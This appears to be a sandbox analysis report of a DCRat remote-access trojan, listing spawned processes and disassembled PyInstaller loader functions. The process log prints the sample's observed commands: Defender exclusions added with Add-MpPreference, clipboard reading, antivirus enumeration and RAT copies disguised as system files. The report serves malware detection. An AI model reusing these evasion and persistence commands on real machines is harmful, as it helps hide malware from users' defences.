Imagebase:	0x7ff740ad0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:32:08
Start date:	05/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:32:08
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:32:09
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:32:09
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:32:10
Start date:	05/08/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff603e30000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:32:10
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:32:10
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:32:11
Start date:	05/08/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff603e30000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:32:11
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:32:11
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:32:12
Start date:	05/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff740ad0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	08:32:13
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7448, Parent PID: 2656

General

Target ID:	34
Start time:	08:32:13
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	08:32:13
Start date:	05/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff740ad0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:32:14
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	08:32:14
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	08:32:14
Start date:	05/08/2024
Path:	C:\Brokercrt\comReviewsession.exe
Wow64 process (32bit):	false
Commandline:	"C:\Brokercrt\comReviewsession.exe"
Imagebase:	0xec0000
File size:	847'360 bytes
MD5 hash:	24DAFEB85B4C72D29606ADF2A59DA04C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	08:32:15
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	08:32:15
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	08:32:15
Start date:	05/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	08:32:15
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\it-IT\dasHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\it-IT\dasHost.exe
Imagebase:	0xef0000
File size:	847'360 bytes
MD5 hash:	24DAFEB85B4C72D29606ADF2A59DA04C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	08:32:15
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\it-IT\dasHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\it-IT\dasHost.exe
Imagebase:	0x110000
File size:	847'360 bytes
MD5 hash:	24DAFEB85B4C72D29606ADF2A59DA04C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	08:32:15
Start date:	05/08/2024
Path:	C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
Imagebase:	0xf40000
File size:	847'360 bytes
MD5 hash:	24DAFEB85B4C72D29606ADF2A59DA04C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
Imagebase:	0x430000
File size:	847'360 bytes
MD5 hash:	24DAFEB85B4C72D29606ADF2A59DA04C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
Imagebase:	0xab0000
File size:	847'360 bytes
MD5 hash:	24DAFEB85B4C72D29606ADF2A59DA04C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff74ce90000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	08:32:16
Start date:	05/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff74ce90000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	211
Start time:	08:32:32
Start date:	05/08/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	221
Start time:	08:32:33
Start date:	05/08/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00007FF76D5C1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to convert DLL search path!, xrefs: 00007FF76D5C38A3
pkg, xrefs: 00007FF76D5C37CF
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF76D5C37EF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF76D5C391A
pyi-disable-windowed-traceback, xrefs: 00007FF76D5C361D
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF76D5C3905
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF76D5C378C
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF76D5C3653
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF76D5C36FC
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF76D5C3A12
Could not create temporary directory!, xrefs: 00007FF76D5C3838
pyi-contents-directory, xrefs: 00007FF76D5C35F8
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF76D5C3A31
MEI, xrefs: 00007FF76D5C374E
_MEIPASS2, xrefs: 00007FF76D5C36A2, 00007FF76D5C36AE, 00007FF76D5C39AC
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF76D5C3820
Failed to start splash screen!, xrefs: 00007FF76D5C3933
bye-runtime-tmpdir, xrefs: 00007FF76D5C35D3

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
API String ID: 514040917-1099759049
Opcode ID: f063c1712e87279c77d8887c1389ef7552d407f6137c2a3eae29b16cd546fbe9
Instruction ID: c99c8860e0fdac09ed77b146a73fd7f673d5fddab605377982c504a4ebb6e327
Opcode Fuzzy Hash: f063c1712e87279c77d8887c1389ef7552d407f6137c2a3eae29b16cd546fbe9
Instruction Fuzzy Hash: 96F15921A2C786D1FB19FB21D5542B9A2A1AF58780FC4403ADE1D43A97FF2CE558CB70

Function 00007FF76D5E5C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76D5E59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E59E9
Part of subcall function 00007FF76D5E59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E5A67
Part of subcall function 00007FF76D5E59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E5AB8

CreateFileW.KERNELBASE ref: 00007FF76D5E5D7A
CreateFileW.KERNEL32 ref: 00007FF76D5E5DCA
GetLastError.KERNEL32 ref: 00007FF76D5E5DFA
GetFileType.KERNELBASE ref: 00007FF76D5E5E0F
GetLastError.KERNEL32 ref: 00007FF76D5E5E19
CloseHandle.KERNEL32 ref: 00007FF76D5E5E4C
CloseHandle.KERNEL32 ref: 00007FF76D5E5FAF
CreateFileW.KERNEL32 ref: 00007FF76D5E5FE4
GetLastError.KERNEL32 ref: 00007FF76D5E5FF3

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: f4dcd9222a0f64b4a608c99ab80cf2d788be897eb611c508f1a7bb86715073c0
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 94C1C336B28A45C6EB10EF68C4902BC7761FB49B98B811235DF2E57B96EF38D551C320

Function 00007FF76D5C79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A1B
RemoveDirectoryW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A9E
DeleteFileW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ABD
FindNextFileW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ACB
FindClose.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ADC
RemoveDirectoryW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7AE5

Strings

%s\*, xrefs: 00007FF76D5C79E2

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 4d27f3747f592dbf4448ab11a96f07e34a2859e872720d56c8b21394b52ae8b4
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 06416321E2CA42D5EB30BB24E8445B9A361FB98754FC40636DD5D42E96FF3CD64A8B30

Function 00007FF76D5C85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF76D5C85D3
FindClose.KERNELBASE ref: 00007FF76D5C85E2

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: ec88b6fe75d1f8700bdab4c2eca9bc2c93fb35243e69a3d215c5a16718a7ef72
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 33F0A422A2C741C6F760AF60B488366B350AB44328F840239DD7E02AD5EF3CD058CE14

Function 00007FF76D5DFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

